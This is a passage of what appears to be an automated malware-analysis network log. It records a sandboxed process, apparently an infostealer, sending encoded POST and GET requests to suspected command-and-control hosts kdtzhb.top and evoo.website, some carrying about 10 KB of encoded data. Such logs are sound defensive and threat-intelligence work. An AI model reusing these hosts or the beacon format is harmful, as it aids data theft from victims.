                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 2b 65 46 44 6e 50 4d 66 47 57 30 6b 53 6b 79 69 75 73 34 59 54 5a 62 34 69 7a 51 2f 62 78 38 45 41 3d 3d
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcY+eFDnPMfGW0kSkyius4YTZb4izQ/bx8EA==
                                                                          Nov 12, 2024 08:53:20.562227964 CET691INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.44999447.242.89.146802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:22.155636072 CET645OUTPOST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 39 6f 6c 6c 36 6b 79 59 4d 31 66 4d 35 39 79 43 57 38 6c 35 2f 2b 48 30 6b 42 59 55 57 57 2b 6e 73 3d
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT9oll6kyYM1fM59yCW8l5/+H0kBYUWW+ns=
                                                                          Nov 12, 2024 08:53:23.126152992 CET691INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.45001047.242.89.146802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:24.696234941 CET10727OUTPOST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 47 74 37 44 73 44 6f 4e 64 75 5a 44 51 37 33 6c 32 67 2b 49 55 79 55 65 34 49 33 7a 54 6f 35 4a 32 58 4e 6b 49 4a 61 68 61 63 69 7a 64 6e 30 39 53 73 38 76 79 53 71 78 2f 51 55 66 6c 6c 4e 63 67 41 6c 6b 41 2b 6a 4a 4e 4f 45 75 76 2f 6f 52 6b 38 55 58 73 7a 65 38 66 4a 44 68 6a 37 54 6d 38 77 71 4d 58 49 58 75 46 49 4d 71 6e 56 6e 76 34 31 48 55 33 38 71 77 39 64 6e 43 30 69 59 63 36 4e 6e 74 52 32 33 71 71 64 63 55 56 57 6b 77 69 4b 6b 75 6c 5a 4e 72 42 6d 47 6b 31 6d 51 71 78 [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciGt7DsDoNduZDQ73l2g+IUyUe4I3zTo5J2XNkIJahacizdn09Ss8vySqx/QUfllNcgAlkA+jJNOEuv/oRk8UXsze8fJDhj7Tm8wqMXIXuFIMqnVnv41HU38qw9dnC0iYc6NntR23qqdcUVWkwiKkulZNrBmGk1mQqx5KMIlYnCZSiQnZrCCY3ptfxjfO/FzuCglgGEFKRU78cQ4qa7h7MlzUZyIkEaOp1s+SU2ss2/kF4Co8jdOxVwLf+ev0VISC3kKfj367ZBT4RlK5jhCDvvghEm0C250h8y5NVItmXtN8yv50hW/U8Ak7W+ytltD1GswlPpQ9JNlzOKNUUN35Wv/BrIUoVGB6logFYYrnuozTzXM4n+NcHlvtu42DzAqpv+Z0RGUDXEBYfAv15q80TyWy6vMmM5eyudAP81AR63e7jRTeQ5S5J6XYaRbc3NfiJruf0NBPmXVKwk3VKKjZxI8GJu2IlcxTI7EtbZgHeb1UwN5W1LdHhs6EkCpXZfsCVjZThMPTNsUutHKPmFcx90oeQR/keASxZAXFWHhTebwm1c+I9kKbnHW4WMkdJvGAWNPOY94QZqCRBhx7/LO3xXT4ZbeDZOjKGROYCtfNlXXf9m1CITfTMhaFJ4VBKBAYrMigF+ZHZXIPKnye/WTFFCq79FVliL+6cs/tmlBRruUwgrbkkpNBF9WsFODCPMpnRnP/Oqu7kk915oufeBkiOMIiimzdRZfbokGECPrtrDTjgDc3qDWc1lcifyzRe/y63kf8Amxg3HSrlkCC7cLkK+waywRjVyzA72kLCzhv6xAIlVHUxB20BPh3yumthHapfA8G [TRUNCATED]
                                                                          Nov 12, 2024 08:53:25.927558899 CET691INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.45002347.242.89.146802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:27.242064953 CET370OUTGET /1iqa/?L2m0Zn=EIYp+2qno3OyA6JS9Y7uk1QSTQ5f7vCBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhVH33IbkgUmM7v94zdg8dOLyK52Qf4FB6p0=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:28.208312035 CET691INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:28 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.450024128.65.195.180802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:33.626616955 CET631OUTPOST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 4d 42 4d 4c 30 72 33 7a 49 7a 32 66 4f 73 48 44 52 34 58 50 46 4b 51 69 78 53 43 30 6a 55 79 4f 67 3d 3d
                                                                          Data Ascii: L2m0Zn=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842MBML0r3zIz2fOsHDR4XPFKQixSC0jUyOg==
                                                                          Nov 12, 2024 08:53:35.149131060 CET458INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:35 GMT
                                                                          Server: Apache/2.4.25 (Debian)
                                                                          Content-Length: 278
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.450025128.65.195.180802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:36.188538074 CET651OUTPOST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 75 6a 2f 32 62 32 35 67 70 37 56 6b 78 46 37 43 58 57 61 4a 49 2b 67 75 62 79 6b 72 6c 63 42 64 73 3d
                                                                          Data Ascii: L2m0Zn=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFuj/2b25gp7VkxF7CXWaJI+gubykrlcBds=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.450026128.65.195.180802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:38.728894949 CET10733OUTPOST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 6d 52 66 38 34 36 47 67 70 67 45 58 36 36 6e 46 33 69 39 67 45 33 61 6e 68 4e 72 33 58 6a 42 4a 55 71 6e 38 32 61 7a 71 74 69 41 62 52 65 46 51 7a 4e 32 30 46 43 67 53 4e 33 2f 4a 47 76 35 53 62 4e 48 33 71 6a 44 4a 2b 53 6e 44 78 72 46 71 6c 35 6c 70 4c 32 4b 36 65 63 62 4e 6a 73 6d 4f 58 6f 30 47 54 50 68 53 6c 75 44 4f 79 77 68 58 46 72 2b 63 54 36 66 74 69 45 58 33 61 79 41 6d 4a 50 71 47 49 57 52 36 36 5a 35 6e 42 59 79 33 4f 46 71 2f 70 53 4e 4c 48 56 54 35 31 37 43 46 6a [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JmRf846GgpgEX66nF3i9gE3anhNr3XjBJUqn82azqtiAbReFQzN20FCgSN3/JGv5SbNH3qjDJ+SnDxrFql5lpL2K6ecbNjsmOXo0GTPhSluDOywhXFr+cT6ftiEX3ayAmJPqGIWR66Z5nBYy3OFq/pSNLHVT517CFjM4mW4PVfqEdqAkm4SjbxsRJ0YO/YFxCLDTFu9sCAPpoMndGoXZSDF8AZ0XoA0iBX+yJyXI0gyxvRktPuHzblv3E3gN2qF0yu7vSxX9jEgtXBdpwF7AkCOcfvcDXdJXjNCoD9Et34cusJ5FF6zB3cbna/WncIOWiagJztwlY+G15i5VCxYf/PwLIZT7HxT/vZRU9ZERCemWWrurJYS0xWJ+mMiSGx7BNHdWHz4cCyliJzmADpAuP8iYqkeC5T7qd2b4R+NuFos90k5tzxexlphpBJB8CaTjJY79z5TGTq9lC2q7zQof8K1cCgYhuzFvTsKCi+gSOxvWnMdPnMwQwLK5NdvkHnK4rRbPF+ECqJx/eCk33kqtsxL56VLiP8NvtdD2fGk9arliYxxdifqGtVFShAHYCPPMEFGCdb5woYsofnb5WiNY3UmR67r5Ao8yxsbYl5yqeD0I+CGHWh22vOj3ucVoX5OajQyfrLoIVoAHgyoTmPNScJSOkJi+7i/Ryagq7bVBtke75JrsbyE0EEX1bxW37AL57GuwASvm28UYNwn44IBOQMawtDM0RbP2BehE0krrXzLMrOYqsEenO4Gzs/JAwWShnkd+j2JOLUpWCcQwldAJmKxJX6OLxph0Ky7HMRO3VvhVitgUCrBjvx3rvKpiqSn2pOff [TRUNCATED]


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
